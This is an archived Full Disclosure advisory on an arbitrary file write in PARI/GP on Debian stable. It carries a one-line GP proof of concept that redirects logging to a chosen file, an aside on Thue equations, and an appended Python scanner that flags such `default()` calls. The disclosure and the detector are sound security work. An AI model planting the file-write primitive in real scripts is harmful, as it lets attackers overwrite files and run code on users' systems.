Message-ID: <CAGUWgD96pYn+utXY_7v3CogGyCQu6yEpe44sOtxfkS9QsVWUxA@mail.gmail.com>
Date: Tue, 26 Nov 2019 12:39:14 +0200
From: Georgi Guninski <gguninski@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] pari/gp on debian stable allow arbitrary file write

pari/gp on debian stable allow arbitrary file write

pari/gp is a CAS (computer algebra system).

pari/gp version 2.9.1 on debian stretch and 2.11 on debian buster
allow arbitrary file write and hence arbitrary code execution.

poc:

========
\\ a.gp
\\ to run: \r a.gp
default("logfile","/tmp/a.txt");default("log",1);print("log(1)");
========

Of mathematical interest is that pari was missing solutions to Thue
equations when assuming GRH (the fix changed the polynomial bound to
an exponential bound):

http://pari.math.u-bordeaux.fr/archives/pari-dev-1207/msg00000.html

t=thue(thueinit(x^3+92*x+1,0),3^3);t

--
CV: https://j.ludost.net/resumegg.pdf
site: http://www.guninski.com
blog: https://j.ludost.net/blog

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
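An added example, not part of the original post or of PARI/GP: a heuristic pre-load check, in Python, that reports `default()` calls in an untrusted GP script which point the interpreter's log or history output at a file, as the PoC above does. The function names and the watch list of defaults are assumptions of this sketch, and a pattern match like this does not see arguments that a script builds at run time.

```python
import re

# Assumed watch list: GP defaults that make the interpreter write to a file.
FILE_DEFAULTS = {"logfile", "log", "histfile"}

# default(key, value), with the key quoted or bare.
DEFAULT_CALL = re.compile(
    r'\bdefault\s*\(\s*"?(\w+)"?\s*,\s*("(?:[^"\\]|\\.)*"|[^)]*)\)')

def strip_line_comment(line):
    """Cut a GP line comment (two backslashes) unless it is inside a string."""
    in_str = False
    i = 0
    while i < len(line):
        c = line[i]
        if in_str:
            if c == "\\":
                i += 1              # skip the escaped character
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
        elif line.startswith("\\\\", i):
            return line[:i]
        i += 1
    return line

def scan_gp(src):
    """Return (line number, default name, value) for each flagged call."""
    # Blank out /* ... */ comments but keep their newlines for line numbers.
    src = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"),
                 src, flags=re.S)
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for m in DEFAULT_CALL.finditer(strip_line_comment(line)):
            key, value = m.group(1), m.group(2).strip().strip('"')
            if key in FILE_DEFAULTS:
                findings.append((lineno, key, value))
    return findings

# The script from the post, embedded as sample input.
POC = r'''\\ a.gp
\\ to run: \r a.gp
default("logfile","/tmp/a.txt");default("log",1);print("log(1)");
'''

if __name__ == "__main__":
    for lineno, key, value in scan_gp(POC):
        print(f"line {lineno}: default({key}) set to {value!r}")
```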